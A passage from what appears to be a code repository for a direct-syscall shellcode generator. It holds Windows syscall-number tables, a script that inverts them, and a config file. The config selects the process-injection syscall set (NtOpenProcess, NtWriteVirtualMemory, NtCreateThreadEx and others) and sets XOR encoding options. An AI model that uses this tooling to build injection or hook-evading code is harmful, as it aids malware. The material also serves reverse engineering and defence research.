"NtQueryIoCompletion", "22": "NtQueryKey", "339": "NtQueryLicenseValue", "340": "NtQueryMultipleValueKey", "341": "NtQueryMutant", "342": "NtQueryOpenSubKeys", "343": "NtQueryOpenSubKeysEx", "327729": "NtQueryPerformanceCounter", "65880": "NtQueryPortInformationProcess", "345": "NtQueryQuotaInformationFile", "81": "NtQuerySection", "346": "NtQuerySecurityAttributesToken", "347": "NtQuerySecurityObject", "348": "NtQuerySecurityPolicy", "349": "NtQuerySemaphore", "350": "NtQuerySymbolicLinkObject", "351": "NtQuerySystemEnvironmentValue", "352": "NtQuerySystemEnvironmentValueEx", "54": "RtlGetNativeSystemInformation", "353": "NtQuerySystemInformationEx", "56": "NtQueryTimer", "655714": "NtQueryTimerResolution", "23": "NtQueryValueKey", "35": "NtQueryVirtualMemory", "73": "NtQueryVolumeInformationFile", "355": "NtQueryWnfStateData", "356": "NtQueryWnfStateNameInformation", "69": "NtQueueApcThread", "357": "NtQueueApcThreadEx", "358": "NtRaiseException", "359": "NtRaiseHardError", "1703942": "NtReadFile", "1703982": "NtReadFileScatter", "360": "NtReadOnlyEnlistment", "84": "NtReadRequestData", "63": "NtReadVirtualMemory", "361": "NtRecoverEnlistment", "362": "NtRecoverResourceManager", "363": "NtRecoverTransactionManager", "364": "NtRegisterProtocolAddressInformation", "196973": "NtRegisterThreadTerminatePort", "1311086": "NtReleaseKeyedEvent", "458784": "NtReleaseMutant", "786442": "NtReleaseSemaphore", "196975": "NtReleaseWorkerFactoryWorker", "1835017": "NtRemoveIoCompletion", "368": "NtRemoveIoCompletionEx", "370": "NtRenameKey", "371": "NtRenameTransactionManager", "372": "NtReplaceKey", "373": "NtReplacePartitionUnit", "12": "NtReplyPort", "11": "NtReplyWaitReceivePort", "43": "NtReplyWaitReceivePortEx", "374": "NtReplyWaitReplyPort", "375": "NtRequestPort", "34": "NtRequestWaitReplyPort", "459128": "NtResetEvent", "786809": "NtResetWriteWatch", "378": "NtRestoreKey", "196987": "NtResumeProcess", "458834": "NtResumeThread", "380": "NtRevertContainerImpersonation", "381": "NtRollbackComplete", "382": "NtRollbackEnlistment", "383": "NtRollbackRegistryTransaction", "384": "NtRollbackTransaction", "385": "NtRollforwardTransactionManager", "524674": "NtSaveKey", "917891": "NtSaveKeyEx", "721284": "NtSaveMergedKeys", "389": "NtSecureConnectPort", "390": "NtSerializeBoot", "391": "NtSetBootEntryOrder", "392": "NtSetBootOptions", "393": "NtSetCachedSigningLevel", "394": "NtSetCachedSigningLevel2", "395": "NtSetContextThread", "655756": "NtSetDebugFilterState", "197005": "NtSetDefaultHardErrorPort", "328078": "NtSetDefaultLocale", "262543": "NtSetDefaultUILanguage", "400": "NtSetDriverEntryOrder", "401": "NtSetEaFile", "458766": "NtSetEvent", "196653": "NtSetEventBoostPriority", "197010": "NtSetHighEventPair", "197011": "NtSetHighWaitLowEventPair", "459156": "NtSetIRTimer", "405": "NtSetInformationDebugObject", "406": "NtSetInformationEnlistment", "39": "NtSetInformationFile", "407": "NtSetInformationJobObject", "408": "NtSetInformationKey", "92": "NtSetInformationObject", "28": "NtSetInformationProcess", "409": "NtSetInformationResourceManager", "410": "NtSetInformationSymbolicLink", "13": "NtSetInformationThread", "411": "NtSetInformationToken", "412": "NtSetInformationTransaction", "413": "NtSetInformationTransactionManager", "414": "NtSetInformationVirtualMemory", "415": "NtSetInformationWorkerFactory", "328096": "NtSetIntervalProfile", "417": "NtSetIoCompletion", "418": "NtSetIoCompletionEx", "419": "NtSetLdtEntries", "197028": "NtSetLowEventPair", "197029": "NtSetLowWaitHighEventPair", "422": "NtSetQuotaInformationFile", "423": "NtSetSecurityObject", "424": "NtSetSystemEnvironmentValue", "425": "NtSetSystemEnvironmentValueEx", "426": "NtSetSystemInformation", "427": "NtSetSystemPowerState", "328108": "NtSetSystemTime", "328109": "NtSetThreadExecutionState", "98": "NtSetTimer", "430": "NtSetTimer2", "431": "NtSetTimerEx", "655792": "NtSetTimerResolution", "262577": "NtSetUuidSeed", "96": "NtSetValueKey", "434": "NtSetVolumeInformationFile", "435": "NtSetWnfProcessNotificationEvent", "262580": "NtShutdownSystem", "437": "NtShutdownWorkerFactory", "197046": "NtSignalAndWaitForSingleObject", "439": "NtSinglePhaseReject", "197048": "NtStartProfile", "197049": "NtStopProfile", "442": "NtSubscribeWnfStateChange", "197051": "NtSuspendProcess", "459196": "NtSuspendThread", "445": "NtSystemDebugControl", "446": "NtTerminateEnclave", "459199": "NtTerminateJobObject", "458796": "NtTerminateProcess", "458835": "NtTerminateThread", "131520": "NtTestAlert", "449": "NtThawRegistry", "450": "NtThawTransactions", "451": "NtTraceControl", "94": "NtTraceEvent", "1114564": "NtTranslateFilePath", "453": "NtUmsThreadYield", "454": "NtUnloadDriver", "455": "NtUnloadKey", "456": "NtUnloadKey2", "457": "NtUnloadKeyEx", "458": "NtUnlockFile", "459": "NtUnlockVirtualMemory", "42": "NtUnmapViewOfSection", "460": "NtUnmapViewOfSectionEx", "461": "NtUnsubscribeWnfStateChange", "462": "NtUpdateWnfStateData", "463": "NtVdmControl", "393680": "NtWaitForAlertByThreadId", "465": "NtWaitForDebugEvent", "1376722": "NtWaitForKeyedEvent", "1900635": "NtWaitForMultipleObjects", "1966106": "NtWaitForMultipleObjects32", "851972": "NtWaitForSingleObject", "467": "NtWaitForWorkViaWorkerFactory", "197076": "NtWaitHighEventPair", "197077": "NtWaitLowEventPair", "196609": "NtWorkerFactoryWorkerReady", "1703944": "NtWriteFile", "1703963": "NtWriteFileGather", "87": "NtWriteRequestData", "58": "NtWriteVirtualMemory", "65606": "NtYieldExecution"}}, "Windows 11": {"21H2":{"0": "NtAccessCheck", "41": "NtAccessCheckAndAuditAlarm", "99": "NtAccessCheckByType", "89": "NtAccessCheckByTypeAndAuditAlarm", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireCrossVmMutant", "104": "NtAcquireProcessActivityReference", "71": "NtAddAtom", "1114217": "NtAddAtomEx", "106": "NtAddBootEntry", "107": "NtAddDriverEntry", "108": "NtAdjustGroupsToken", "65": "NtAdjustPrivilegesToken", "109": "NtAdjustTokenClaimsAndDeviceGroups", "458862": "NtAlertResumeThread", "196719": "NtAlertThread", "262256": "NtAlertThreadByThreadId", "262257": "NtAllocateLocallyUniqueId", "114": "NtAllocateReserveObject", "115": "NtAllocateUserPhysicalPages", "116": "NtAllocateUserPhysicalPagesEx", "1114229": "NtAllocateUuids", "24": "NtAllocateVirtualMemory", "118": "NtAllocateVirtualMemoryEx", "119": "NtAlpcAcceptConnectPort", "120": "NtAlpcCancelMessage", "121": "NtAlpcConnectPort", "122": "NtAlpcConnectPortEx", "123": "NtAlpcCreatePort", "124": "NtAlpcCreatePortSection", "125": "NtAlpcCreateResourceReserve", "126": "NtAlpcCreateSectionView", "127": "NtAlpcCreateSecurityContext", "128": "NtAlpcDeletePortSection", "129": "NtAlpcDeleteResourceReserve", "130": "NtAlpcDeleteSectionView", "131": "NtAlpcDeleteSecurityContext", "132": "NtAlpcDisconnectPort", "133": "NtAlpcImpersonateClientContainerOfPort", "134": "NtAlpcImpersonateClientOfPort", "135": "NtAlpcOpenSenderProcess", "136": "NtAlpcOpenSenderThread", "137": "NtAlpcQueryInformation", "138": "NtAlpcQueryInformationMessage", "139": "NtAlpcRevokeSecurityContext", "140": "NtAlpcSendWaitReceivePort", "141": "NtAlpcSetInformation", "76": "NtApphelpCacheControl", "327822": "NtAreMappedFilesTheSame", "524431": "NtAssignProcessToJobObject", "144": "NtAssociateWaitCompletionPacket", "145": "NtCallEnclave", "5": "NtCallbackReturn", "93": "NtCancelIoFile", "146": "NtCancelIoFileEx", "147": "NtCancelSynchronousIoFile", "458849": "NtCancelTimer", "148": "NtCancelTimer2", "149": "NtCancelWaitCompletionPacket", "150": "NtChangeProcessState", "151": "NtChangeThreadState", "196670": "NtClearEvent", "196671": "NtClose", "59": "NtCloseObjectAuditAlarm", "152": "NtCommitComplete", "153": "NtCommitEnlistment", "154": "NtCommitRegistryTransaction", "155": "NtCommitTransaction", "156": "NtCompactKeys", "157": "NtCompareObjects", "158": "NtCompareSigningLevels", "159": "NtCompareTokens", "160": "NtCompleteConnectPort", "196769": "NtCompressKey", "162": "NtConnectPort", "67": "NtContinue", "163": "NtContinueEx", "164": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "165": "NtCreateCrossVmEvent", "166": "NtCreateCrossVmMutant", "167": "NtCreateDebugObject", "168": "NtCreateDirectoryObject", "169": "NtCreateDirectoryObjectEx", "170": "NtCreateEnclave", "171": "NtCreateEnlistment", "72": "NtCreateEvent", "172": "NtCreateEventPair", "85": "NtCreateFile", "173": "NtCreateIRTimer", "174": "NtCreateIoCompletion", "175": "NtCreateIoRing", "176": "NtCreateJobObject", "177": "NtCreateJobSet", "29": "NtCreateKey", "178": "NtCreateKeyTransacted", "179": "NtCreateKeyedEvent", "180": "NtCreateLowBoxToken", "181": "NtCreateMailslotFile", "182": "NtCreateMutant", "183": "NtCreateNamedPipeFile", "184": "NtCreatePagingFile", "185": "NtCreatePartition", "186": "NtCreatePort", "187": "NtCreatePrivateNamespace", "188": "NtCreateProcess", "77": "NtCreateProcessEx", "189": "NtCreateProcessStateChange", "190": "NtCreateProfile", "191": "NtCreateProfileEx", "192": "NtCreateRegistryTransaction", "193": "NtCreateResourceManager", "74": "NtCreateSection", "194": "NtCreateSectionEx", "195": "NtCreateSemaphore", "196": "NtCreateSymbolicLinkObject", "78": "NtCreateThread", "197": "NtCreateThreadEx", "198": "NtCreateThreadStateChange", "199": "NtCreateTimer", "200": "NtCreateTimer2", "201": "NtCreateToken", "202": "NtCreateTokenEx", "203": "NtCreateTransaction", "204": "NtCreateTransactionManager", "205": "NtCreateUserProcess", "206": "NtCreateWaitCompletionPacket", "207": "NtCreateWaitablePort", "208": "NtCreateWnfStateName", "209": "NtCreateWorkerFactory", "524498": "NtDebugActiveProcess", "211": "NtDebugContinue", "393268": "NtDelayExecution", "262356": "NtDeleteAtom", "213": "NtDeleteBootEntry", "214": "NtDeleteDriverEntry", "215": "NtDeleteFile", "216": "NtDeleteKey", "217": "NtDeleteObjectAuditAlarm", "218": "NtDeletePrivateNamespace", "219": "NtDeleteValueKey", "220": "NtDeleteWnfStateData", "221": "NtDeleteWnfStateName", "1769479": "NtDeviceIoControlFile", "222": "NtDirectGraphicsCall", "223": "NtDisableLastKnownGood", "224": "NtDisplayString", "225": "NtDrawText", "60": "NtDuplicateObject", "66": "NtDuplicateToken", "226": "NtEnableLastKnownGood", "227": "NtEnumerateBootEntries", "228": "NtEnumerateDriverEntries", "50": "NtEnumerateKey", "229": "NtEnumerateSystemEnvironmentValuesEx", "230": "NtEnumerateTransactionObject", "19": "NtEnumerateValueKey", "231": "NtExtendSection", "232": "NtFilterBootOption", "233": "NtFilterToken", "234": "NtFilterTokenEx", "655380": "NtFindAtom", "75": "NtFlushBuffersFile", "235": "NtFlushBuffersFileEx", "236": "NtFlushInstallUILanguage", "786669": "NtFlushInstructionCache", "196846": "NtFlushKey", "239": "NtFlushProcessWriteBuffers", "240": "NtFlushVirtualMemory", "65777": "NtFlushWriteBuffer", "242": "NtFreeUserPhysicalPages", "30": "NtFreeVirtualMemory", "243": "NtFreezeRegistry", "244": "NtFreezeTransactions", "1769529": "NtFsControlFile", "245": "NtGetCachedSigningLevel", "246": "NtGetCompleteWnfStateSubscription", "247": "NtGetContextThread", "1638648": "NtGetCurrentProcessorNumber", "249": "NtGetCurrentProcessorNumberEx", "459002": "NtGetDevicePowerState", "251": "NtGetMUIRegistryInfo", "252": "NtGetNextProcess", "253": "NtGetNextThread", "254": "NtGetNlsSectionPtr", "255": "NtGetNotificationResourceManager", "256": "NtGetWriteWatch", "196865": "NtImpersonateAnonymousToken", "458783": "NtImpersonateClientOfPort", "258": "NtImpersonateThread", "259": "NtInitializeEnclave", "260": "NtInitializeNlsFiles", "261": "NtInitializeRegistry", "1114374": "NtInitiatePowerAction", "524367": "NtIsProcessInJob", "65799": "NtIsSystemResumeAutomatic", "264": "NtIsUILanguageComitted", "265": "NtListenPort", "266": "NtLoadDriver", "267": "NtLoadEnclaveData", "268": "NtLoadKey", "269": "NtLoadKey2", "270": "NtLoadKey3", "271": "NtLoadKeyEx", "272": "NtLockFile", "327953": "NtLockProductActivationKeys", "196882": "NtLockRegistryKey", "275": "NtLockVirtualMemory", "196884": "NtMakePermanentObject", "196885": "NtMakeTemporaryObject", "278": "NtManageHotPatch", "279": "NtManagePartition", "280": "NtMapCMFModule", "655641": "NtMapUserPhysicalPages", "655363": "NtMapUserPhysicalPagesScatter", "40": "NtMapViewOfSection", "282": "NtMapViewOfSectionEx", "283": "NtModifyBootEntry", "284": "NtModifyDriverEntry", "285": "NtNotifyChangeDirectoryFile", "286": "NtNotifyChangeDirectoryFileEx", "287": "NtNotifyChangeKey", "288": "NtNotifyChangeMultipleKeys", "289": "NtNotifyChangeSession", "88": "NtOpenDirectoryObject", "290": "NtOpenEnlistment", "64": "NtOpenEvent", "291": "NtOpenEventPair", "51": "NtOpenFile", "292": "NtOpenIoCompletion", "293": "NtOpenJobObject", "18": "NtOpenKey", "294": "NtOpenKeyEx", "295": "NtOpenKeyTransacted", "296": "NtOpenKeyTransactedEx", "297": "NtOpenKeyedEvent", "298": "NtOpenMutant", "299": "NtOpenObjectAuditAlarm", "300": "NtOpenPartition", "301": "NtOpenPrivateNamespace", "38": "NtOpenProcess", "302": "NtOpenProcessToken", "48": "NtOpenProcessTokenEx", "303": "NtOpenRegistryTransaction", "304": "NtOpenResourceManager", "55": "NtOpenSection", "305": "NtOpenSemaphore", "306": "NtOpenSession", "307": "NtOpenSymbolicLinkObject", "308": "NtOpenThread", "36": "NtOpenThreadToken", "47": "NtOpenThreadTokenEx", "309": "NtOpenTimer", "310": "NtOpenTransaction", "311": "NtOpenTransactionManager", "312": "NtPlugPlayControl", "95": "NtPowerInformation", "313": "NtPrePrepareComplete", "314": "NtPrePrepareEnlistment", "315": "NtPrepareComplete", "316": "NtPrepareEnlistment", "786749": "NtPrivilegeCheck", "318": "NtPrivilegeObjectAuditAlarm", "319": "NtPrivilegedServiceAuditAlarm", "320": "NtPropagationComplete", "321": "NtPropagationFailed", "80": "NtProtectVirtualMemory", "322": "NtPssCaptureVaSpaceBulk", "459075": "NtPulseEvent", "61": "NtQueryAttributesFile", "324": "NtQueryAuxiliaryCounterFrequency", "325": "NtQueryBootEntryOrder", "326": "NtQueryBootOptions", "328007": "NtQueryDebugFilterState", "327701": "NtQueryDefaultLocale", "262212": "NtQueryDefaultUILanguage", "53": "NtQueryDirectoryFile", "328": "NtQueryDirectoryFileEx", "329": "NtQueryDirectoryObject", "330": "NtQueryDriverEntryOrder", "331": "NtQueryEaFile", "86": "NtQueryEvent", "332": "NtQueryFullAttributesFile", "333": "NtQueryInformationAtom", "334": "NtQueryInformationByName", "335": "NtQueryInformationEnlistment", "17": "NtQueryInformationFile", "336": "NtQueryInformationJobObject", "337": "NtQueryInformationPort", "25": "NtQueryInformationProcess", "338": "NtQueryInformationResourceManager", "37": "NtQueryInformationThread", "33": "NtQueryInformationToken", "339": "NtQueryInformationTransaction", "340": "NtQueryInformationTransactionManager", "341": "NtQueryInformationWorkerFactory", "262486": "NtQueryInstallUILanguage", "328023": "NtQueryIntervalProfile", "344": "NtQueryIoCompletion", "345": "NtQueryIoRingCapabilities", "22": "NtQueryKey", "346": "NtQueryLicenseValue", "347": "NtQueryMultipleValueKey", "348": "NtQueryMutant", "16": "NtQueryObject", "349": "NtQueryOpenSubKeys", "350": "NtQueryOpenSubKeysEx", "327729": "NtQueryPerformanceCounter", "65887": "NtQueryPortInformationProcess", "352": "NtQueryQuotaInformationFile", "81": "NtQuerySection", "353": "NtQuerySecurityAttributesToken", "354": "NtQuerySecurityObject", "355": "NtQuerySecurityPolicy", "356": "NtQuerySemaphore", "357": "NtQuerySymbolicLinkObject", "358": "NtQuerySystemEnvironmentValue", "359": "NtQuerySystemEnvironmentValueEx", "54": "NtQuerySystemInformation", "360": "NtQuerySystemInformationEx", "56": "NtQueryTimer", "655721": "NtQueryTimerResolution", "23": "NtQueryValueKey", "35": "NtQueryVirtualMemory", "73": "NtQueryVolumeInformationFile", "362": "NtQueryWnfStateData", "363": "NtQueryWnfStateNameInformation", "69": "NtQueueApcThread", "364": "NtQueueApcThreadEx", "365": "NtQueueApcThreadEx2", "366": "NtRaiseException", "367": "NtRaiseHardError", "1703942": "NtReadFile", "1703982": "NtReadFileScatter", "368": "NtReadOnlyEnlistment", "84": "NtReadRequestData", "63": "NtReadVirtualMemory", "369": "NtReadVirtualMemoryEx", "370": "NtRecoverEnlistment", "371": "NtRecoverResourceManager", "372": "NtRecoverTransactionManager", "373": "NtRegisterProtocolAddressInformation", "196982": "NtRegisterThreadTerminatePort", "1311095": "NtReleaseKeyedEvent", "458784": "NtReleaseMutant", "786442": "NtReleaseSemaphore", "196984": "NtReleaseWorkerFactoryWorker", "1835017": "NtRemoveIoCompletion", "377": "NtRemoveIoCompletionEx", "524666": "NtRemoveProcessDebug", "379": "NtRenameKey", "380": "NtRenameTransactionManager", "381": "NtReplaceKey", "382": "NtReplacePartitionUnit", "12": "NtReplyPort", "11": "NtReplyWaitReceivePort", "43": "NtReplyWaitReceivePortEx", "383": "NtReplyWaitReplyPort", "384": "NtRequestPort", "34": "NtRequestWaitReplyPort", "459137": "NtResetEvent", "786818": "NtResetWriteWatch", "387": "NtRestoreKey", "196996": "NtResumeProcess", "458834": "NtResumeThread", "389": "NtRevertContainerImpersonation", "390": "NtRollbackComplete", "391": "NtRollbackEnlistment", "392": "NtRollbackRegistryTransaction", "393": "NtRollbackTransaction", "394": "NtRollforwardTransactionManager", "524683": "NtSaveKey", "917900": "NtSaveKeyEx", "721293": "NtSaveMergedKeys", "398": "NtSecureConnectPort", "399": "NtSerializeBoot", "400": "NtSetBootEntryOrder", "401": "NtSetBootOptions", "402": "NtSetCachedSigningLevel", "403": "NtSetCachedSigningLevel2", "404": "NtSetContextThread", "655765": "NtSetDebugFilterState", "197014": "NtSetDefaultHardErrorPort", "328087": "NtSetDefaultLocale", "262552": "NtSetDefaultUILanguage", "409": "NtSetDriverEntryOrder", "410": "NtSetEaFile", "458766": "NtSetEvent", "196653": "NtSetEventBoostPriority", "197019": "NtSetHighEventPair", "197020": "NtSetHighWaitLowEventPair", "459165": "NtSetIRTimer", "414": "NtSetInformationDebugObject", "415": "NtSetInformationEnlistment", "39": "NtSetInformationFile", "416": "NtSetInformationIoRing", "417": "NtSetInformationJobObject", "418": "NtSetInformationKey", "92": "NtSetInformationObject", "28": "NtSetInformationProcess", "419": "NtSetInformationResourceManager", "420": "NtSetInformationSymbolicLink", "13": "NtSetInformationThread", "421": "NtSetInformationToken", "422": "NtSetInformationTransaction", "423": "NtSetInformationTransactionManager", "424": "NtSetInformationVirtualMemory", "425": "NtSetInformationWorkerFactory", "328106": "NtSetIntervalProfile", "427": "NtSetIoCompletion", "428": "NtSetIoCompletionEx", "429": "NtSetLdtEntries", "197038": "NtSetLowEventPair", "197039": "NtSetLowWaitHighEventPair", "432": "NtSetQuotaInformationFile", "433": "NtSetSecurityObject", "434": "NtSetSystemEnvironmentValue", "435": "NtSetSystemEnvironmentValueEx", "436": "NtSetSystemInformation", "437": "NtSetSystemPowerState", "328118": "NtSetSystemTime", "328119": "NtSetThreadExecutionState", "98": "NtSetTimer", "440": "NtSetTimer2", "441": "NtSetTimerEx", "655802": "NtSetTimerResolution", "262587": "NtSetUuidSeed", "96": "NtSetValueKey", "444": "NtSetVolumeInformationFile", "445": "NtSetWnfProcessNotificationEvent", "262590": "NtShutdownSystem", "447": "NtShutdownWorkerFactory", "1245632": "NtSignalAndWaitForSingleObject", "449": "NtSinglePhaseReject", "197058": "NtStartProfile", "197059": "NtStopProfile", "452": "NtSubmitIoRing", "453": "NtSubscribeWnfStateChange", "197062": "NtSuspendProcess", "459207": "NtSuspendThread", "456": "NtSystemDebugControl", "457": "NtTerminateEnclave", "459210": "NtTerminateJobObject", "458796": "NtTerminateProcess", "458835": "NtTerminateThread", "131531": "NtTestAlert", "460": "NtThawRegistry", "461": "NtThawTransactions", "462": "NtTraceControl", "94": "NtTraceEvent", "1114575": "NtTranslateFilePath", "464": "NtUmsThreadYield", "465": "NtUnloadDriver", "466": "NtUnloadKey", "467": "NtUnloadKey2", "468": "NtUnloadKeyEx", "469": "NtUnlockFile", "470": "NtUnlockVirtualMemory", "42": "NtUnmapViewOfSection", "471": "NtUnmapViewOfSectionEx", "472": "NtUnsubscribeWnfStateChange", "473": "NtUpdateWnfStateData", "474": "NtVdmControl", "393691": "NtWaitForAlertByThreadId", "476": "NtWaitForDebugEvent", "1376733": "NtWaitForKeyedEvent", "1900635": "NtWaitForMultipleObjects", "1966106": "NtWaitForMultipleObjects32", "851972": "NtWaitForSingleObject", "478": "NtWaitForWorkViaWorkerFactory", "197087": "NtWaitHighEventPair", "197088": "NtWaitLowEventPair", "196609": "NtWorkerFactoryWorkerReady", "1703944": "NtWriteFile", "1703963": "NtWriteFileGather", "87": "NtWriteRequestData", "58": "NtWriteVirtualMemory", "65606": "NtYieldExecution", "493": "RtlGetNativeSystemInformation"}}} ================================================ FILE: start/__init__.py ================================================ from . syscall_signatures import * # from parseconf import * from . parseconf import * ================================================ FILE: start/config.cfg ================================================ [Windows 10] r21h2 = True r22h2 = True r21h1 = False r20h2 = False r2004 = False r1909 = False r1903 = False r1809 = False r1803 = False r1709 = False r1703 = False r1607 = False r1511 = False r1507 = False [Windows 7] sp0 = False sp1 = True [Windows 11] b21h2 = False b22h2 = True [SYSCALLS] selected_syscalls = ['NtAllocateVirtualMemory', 'NtQuerySystemInformation', 'NtOpenProcess', 'NtCreateFile', 'NtCreateSection', 'NtMapViewOfSection', 'NtProtectVirtualMemory', 'NtWriteVirtualMemory', 'NtCreateThreadEx', 'NtWaitForSingleObject'] [MISC] print_string_literal_of_bytes = True show_comments = True syscall_style = fs intended_compiler = nasm use_shareddata_for_win1011 = False encode_user_share_data = True usd_encode_xor_key = 0xc0de usd_encode_with_add = True usd_encode_add_val = 0xbeef get_teb_from_r12 = False ================================================ FILE: start/convertSyscallsToReverse.py ================================================ import os import json class EMU(): def __init__(self): self.maxCounter = 500000 self.arch = 32 self.debug = False self.breakOutOfLoops = True self.maxLoop = 50000 # to break out of loops self.entryOffset = 0 self.codeCoverage = True self.beginCoverage = False self.timelessDebugging = False # todo: bramwell self.winVersion = "Windows 10" self.winSP = "2004" with open(os.path.join(os.path.dirname(__file__), 'WinSysCalls.json'), 'r') as syscall_file: syscall_dict = json.load(syscall_file) with open(os.path.join(os.path.dirname(__file__), 'reverseWinsysCalls.json'), 'r') as syscall_file: reverseSyscall_dict = json.load(syscall_file) em = EMU() syscallID=18 sysCallName = syscall_dict[em.winVersion][em.winSP][str(syscallID)] print (sysCallName) d=syscall_dict # dict((v, k) for k, v, k in syscall_dict.items()) newDict={} t=0 tempDictOuter0={} for k, v in syscall_dict.items(): # print (k) if t<330: print (v, type (v)) tempDictOuter={} for p_id, p_info in v.items(): print ("***") print("\nos_release:", p_id) tempDict={} for key in p_info: # print(key + ':', p_info[key]) # print(p_info[key]+ ':'+ key) tempDict[p_info[key]] = int(key) # print (len(tempDict), "tempDict") # print (tempDict) tempDictOuter[p_id]=tempDict t+=1 tempDictOuter0[k]=tempDictOuter print (len(tempDictOuter0), "tempDictOuter0") print (tempDictOuter0) # print (newDict) my_map=newDict # inv_map = {v: k for k, v in newDict.items()} # print (inv_map) # for p_id, p_info in newDict.items(): # print ("***") # print("\nos_release:", p_id) # for key in p_info: # print(key + ':', p_info[key]) # print(p_info[key]+ ':'+ key) string1="""random line random line pop eax pop edi """ random2="""pop edx """ # print (string1+random2) # inv_map = dict(zip(newDict.values(), newDict.keys())) # print (em.winVersion, em.winSP) # sysCallName = reverseSyscall_dict[em.winVersion][em.winSP]["NtAllocateVirtualMemory"] # print (sysCallName) ================================================ FILE: start/myKeys.py ================================================ OPENAI_API_KEY="putYourKeyHere" ================================================ FILE: start/parseconf.py ================================================ import os import configparser from .singleton import Singleton class Configuration(metaclass=Singleton): def __init__(self, cfgFile): self.cfgFile = cfgFile def readConf(self): conf = configparser.RawConfigParser() _path = os.path.join( os.path.dirname(os.path.abspath(__file__)), self.cfgFile ) conf.read(_path) self.config = conf return conf def changeConf(self, *args): # print ("changeConf") conf = configparser.RawConfigParser() _path = os.path.join( os.path.dirname(os.path.abspath(__file__)), self.cfgFile ) conf.read(_path) self.config = conf self.args = args[0] list_windows10 = self.config.items('Windows 10') list_windows11 = self.config.items('Windows 11') list_windows7 = self.config.items('Windows 7') list_Syscalls = self.config.items('SYSCALLS') list_Misc = self.config.items('MISC') # sharem_search = self.config.items('SHAREM SEARCH') # sharem_syscalls = self.config.items('SHAREM SYSCALLS') # sharem_decoder = self.config.items('SHAREM DECRYPT') # sharem_emulation = self.config.items('SHAREM EMULATION') # sharem_disassembly = self.config.items('SHAREM DISASSEMBLY') for key, val in self.args.items(): for x in list_windows10: if(key in x): self.config['Windows 10'][str(key)] = str(val) # print(self.config['Windows 10'][str(key)],str(val)) for key, val in self.args.items(): for x in list_windows7: if(key in x): self.config['Windows 7'][str(key)] = str(val) for key, val in self.args.items(): for x in list_windows11: if(key in x): self.config['Windows 11'][str(key)] = str(val) for key, val in self.args.items(): for x in list_Syscalls: if(key in x): self.config['SYSCALLS'][str(key)] = str(val) for key, val in self.args.items(): for x in list_Misc: if(key in x): self.config['MISC'][str(key)] = str(val) # print("Key: ", key, "Val: ", val) # print(vars(self.config)) # if "pushret" in self.args: # self.config['SHAREM SEARCH']['pushret'] = str(self.args['pushret']) #save = self.save() def save(self): # print("saving") _path = os.path.join( os.path.dirname(os.path.abspath(__file__)), self.cfgFile ) with open(_path, "w") as configfile: self.config.write(configfile) # print(configfile) # print("done") ================================================ FILE: start/reverseWinSyscalls.json ================================================ {"Windows XP": {"SP1": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateUserPhysicalPages": "108", "NtAllocateUuids": "109", "NtAreMappedFilesTheSame": "110", "NtAssignProcessToJobObject": "111", "NtCancelDeviceWakeupRequest": "112", "NtCompactKeys": "113", "NtCompareTokens": "114", "NtCompleteConnectPort": "115", "NtCompressKey": "116", "NtConnectPort": "117", "NtCreateDebugObject": "118", 